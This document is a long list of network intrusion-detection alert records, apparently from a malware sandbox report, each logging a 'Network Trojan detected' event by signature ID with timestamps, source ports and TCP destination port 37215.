                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.914881
                  SID:2835222
                  Source Port:36460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.866986
                  SID:2829579
                  Source Port:47606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231891
                  SID:2835222
                  Source Port:41070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384931
                  SID:2829579
                  Source Port:54412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.668696
                  SID:2835222
                  Source Port:37532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.790374
                  SID:2835222
                  Source Port:42320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.789449
                  SID:2835222
                  Source Port:38502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.813463
                  SID:2835222
                  Source Port:48368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.802348
                  SID:2829579
                  Source Port:57760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514525
                  SID:2835222
                  Source Port:37850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.166033
                  SID:2835222
                  Source Port:49812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.176697
                  SID:2829579
                  Source Port:47762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.772266
                  SID:2835222
                  Source Port:57266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.117875
                  SID:2829579
                  Source Port:42982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.857526
                  SID:2829579
                  Source Port:51774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.749012
                  SID:2829579
                  Source Port:45604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.134313
                  SID:2829579
                  Source Port:60210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.157992
                  SID:2829579
                  Source Port:47874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.598533
                  SID:2829579
                  Source Port:58788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.644790
                  SID:2835222
                  Source Port:40644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.090625
                  SID:2835222
                  Source Port:34916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.896326
                  SID:2835222
                  Source Port:58396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.561007
                  SID:2829579
                  Source Port:49508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.825440
                  SID:2829579
                  Source Port:40020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.777569
                  SID:2829579
                  Source Port:55454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.090801
                  SID:2829579
                  Source Port:40330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.792602
                  SID:2829579
                  Source Port:33754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.774026
                  SID:2835222
                  Source Port:36366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.562262
                  SID:2835222
                  Source Port:34656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.242902
                  SID:2829579
                  Source Port:57486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.285291
                  SID:2835222
                  Source Port:33740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.265818
                  SID:2829579
                  Source Port:47366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.566998
                  SID:2835222
                  Source Port:47464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.284234
                  SID:2835222
                  Source Port:55842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.415895
                  SID:2835222
                  Source Port:50734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.113927
                  SID:2835222
                  Source Port:58350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.496138
                  SID:2835222
                  Source Port:44326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.483215
                  SID:2835222
                  Source Port:41036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.881615
                  SID:2829579
                  Source Port:33466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.301991
                  SID:2835222
                  Source Port:37424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.867801
                  SID:2835222
                  Source Port:54048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.608013
                  SID:2829579
                  Source Port:41882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.739921
                  SID:2835222
                  Source Port:47314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.652077
                  SID:2829579
                  Source Port:35590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.795210
                  SID:2835222
                  Source Port:35426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.127595
                  SID:2829579
                  Source Port:46890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389213
                  SID:2835222
                  Source Port:49500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.013307
                  SID:2835222
                  Source Port:37774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.881343
                  SID:2835222
                  Source Port:37348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.597110
                  SID:2829579
                  Source Port:45958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.880415
                  SID:2835222
                  Source Port:38984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231077
                  SID:2835222
                  Source Port:35806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.161744
                  SID:2835222
                  Source Port:48730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.145981
                  SID:2835222
                  Source Port:44292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.265037
                  SID:2829579
                  Source Port:44846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.414993
                  SID:2835222
                  Source Port:46632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.275935
                  SID:2835222
                  Source Port:44974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702208
                  SID:2829579
                  Source Port:34378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629706
                  SID:2829579
                  Source Port:60662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.294435
                  SID:2835222
                  Source Port:52660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.637224
                  SID:2835222
                  Source Port:56790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.869789
                  SID:2829579
                  Source Port:38388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.815716
                  SID:2835222
                  Source Port:39012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.793732
                  SID:2835222
                  Source Port:53472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.548548
                  SID:2829579
                  Source Port:42644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.569954
                  SID:2835222
                  Source Port:34762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.169904
                  SID:2835222
                  Source Port:56994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.570253
                  SID:2835222
                  Source Port:55542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.599014
                  SID:2835222
                  Source Port:44106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.433410
                  SID:2835222
                  Source Port:50242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.796781
                  SID:2829579
                  Source Port:38190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.033866
                  SID:2829579
                  Source Port:43252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.840335
                  SID:2835222
                  Source Port:53050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.148886
                  SID:2835222
                  Source Port:32798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.850530
                  SID:2835222
                  Source Port:45692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.975524
                  SID:2829579
                  Source Port:44926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.939250
                  SID:2835222
                  Source Port:36218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2829579
                  Source Port:40698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.186644
                  SID:2835222
                  Source Port:52140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.116732
                  SID:2835222
                  Source Port:44320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.054322
                  SID:2835222
                  Source Port:36354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.395852
                  SID:2829579
                  Source Port:44076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.050509
                  SID:2829579
                  Source Port:44672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.523012
                  SID:2835222
                  Source Port:36410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.416774
                  SID:2829579
                  Source Port:37846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.595344
                  SID:2835222
                  Source Port:36470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.630697
                  SID:2829579
                  Source Port:33396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.163542
                  SID:2829579
                  Source Port:36816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.404478
                  SID:2835222
                  Source Port:59888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.754764
                  SID:2829579
                  Source Port:42642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.024313
                  SID:2829579
                  Source Port:33622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.801295
                  SID:2835222
                  Source Port:47056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.551601
                  SID:2829579
                  Source Port:36300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.405669
                  SID:2835222
                  Source Port:38728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.818188
                  SID:2829579
                  Source Port:56386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.037222
                  SID:2829579
                  Source Port:40636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.020493
                  SID:2835222
                  Source Port:38220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.919171
                  SID:2835222
                  Source Port:34990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.632510
                  SID:2829579
                  Source Port:53204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.109463
                  SID:2835222
                  Source Port:53040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.271140
                  SID:2829579
                  Source Port:33700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285937
                  SID:2835222
                  Source Port:44584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.934356
                  SID:2835222
                  Source Port:36738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.532382
                  SID:2829579
                  Source Port:40666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.783932
                  SID:2835222
                  Source Port:38140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.791528
                  SID:2829579
                  Source Port:38028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.527475
                  SID:2829579
                  Source Port:35168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.512743
                  SID:2829579
                  Source Port:43230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.802852
                  SID:2829579
                  Source Port:36974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.775868
                  SID:2835222
                  Source Port:40100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.695962
                  SID:2835222
                  Source Port:51166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.492853
                  SID:2835222
                  Source Port:54412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.777046
                  SID:2835222
                  Source Port:34350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.803828
                  SID:2835222
                  Source Port:53526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.021892
                  SID:2829579
                  Source Port:37338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.182611
                  SID:2835222
                  Source Port:40252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.390628
                  SID:2835222
                  Source Port:39696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.966412
                  SID:2829579
                  Source Port:37842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.156956
                  SID:2835222
                  Source Port:43948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.490164
                  SID:2835222
                  Source Port:60274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.201787
                  SID:2829579
                  Source Port:52600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2835222
                  Source Port:58478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558615
                  SID:2835222
                  Source Port:35690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.939106
                  SID:2835222
                  Source Port:44118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.863618
                  SID:2829579
                  Source Port:42370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.890246
                  SID:2835222
                  Source Port:55936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.806143
                  SID:2829579
                  Source Port:56346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.429574
                  SID:2835222
                  Source Port:40606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.347593
                  SID:2835222
                  Source Port:60944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.155677
                  SID:2835222
                  Source Port:58192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.578082
                  SID:2835222
                  Source Port:34502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.558138
                  SID:2835222
                  Source Port:49942
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.312815
                  SID:2829579
                  Source Port:36008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.569394
                  SID:2835222
                  Source Port:55424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.785373
                  SID:2835222
                  Source Port:37376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.397076
                  SID:2829579
                  Source Port:45084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.098508
                  SID:2829579
                  Source Port:53418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.703555
                  SID:2835222
                  Source Port:60512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.634002
                  SID:2829579
                  Source Port:48218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.553494
                  SID:2829579
                  Source Port:54598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.569923
                  SID:2835222
                  Source Port:42790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.807421
                  SID:2829579
                  Source Port:37248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.819720
                  SID:2829579
                  Source Port:58330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.833354
                  SID:2829579
                  Source Port:38742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.149592
                  SID:2835222
                  Source Port:55038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.509927
                  SID:2829579
                  Source Port:52200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.633994
                  SID:2829579
                  Source Port:42286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.078951
                  SID:2829579
                  Source Port:55740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.824785
                  SID:2835222
                  Source Port:34816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.840118
                  SID:2829579
                  Source Port:32946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.972432
                  SID:2829579
                  Source Port:38526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.095355
                  SID:2829579
                  Source Port:37594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:21.455167
                  SID:2835222
                  Source Port:42396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.169251
                  SID:2835222
                  Source Port:38548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.623094
                  SID:2835222
                  Source Port:48456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.000984
                  SID:2829579
                  Source Port:36182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2829579
                  Source Port:34842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.128256
                  SID:2829579
                  Source Port:45770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.452655
                  SID:2829579
                  Source Port:60584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.924312
                  SID:2835222
                  Source Port:44912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.183913
                  SID:2829579
                  Source Port:38142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.969206
                  SID:2835222
                  Source Port:54956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.767328
                  SID:2829579
                  Source Port:32964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.877679
                  SID:2835222
                  Source Port:37492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.129630
                  SID:2829579
                  Source Port:45078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.712584
                  SID:2835222
                  Source Port:43852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.118547
                  SID:2829579
                  Source Port:58986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.871352
                  SID:2829579
                  Source Port:49932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.494437
                  SID:2829579
                  Source Port:38604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.609445
                  SID:2829579
                  Source Port:59990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.040763
                  SID:2835222
                  Source Port:56984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.545525
                  SID:2835222
                  Source Port:59300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833960
                  SID:2835222
                  Source Port:49712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.802348
                  SID:2835222
                  Source Port:43876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.175593
                  SID:2829579
                  Source Port:44898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.521553
                  SID:2835222
                  Source Port:39018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.270060
                  SID:2835222
                  Source Port:46786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.301587
                  SID:2829579
                  Source Port:51700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.302644
                  SID:2829579
                  Source Port:50442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415966
                  SID:2835222
                  Source Port:56490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2835222
                  Source Port:54970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.636807
                  SID:2829579
                  Source Port:59170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.452783
                  SID:2835222
                  Source Port:54816
                  Destination Port:37215
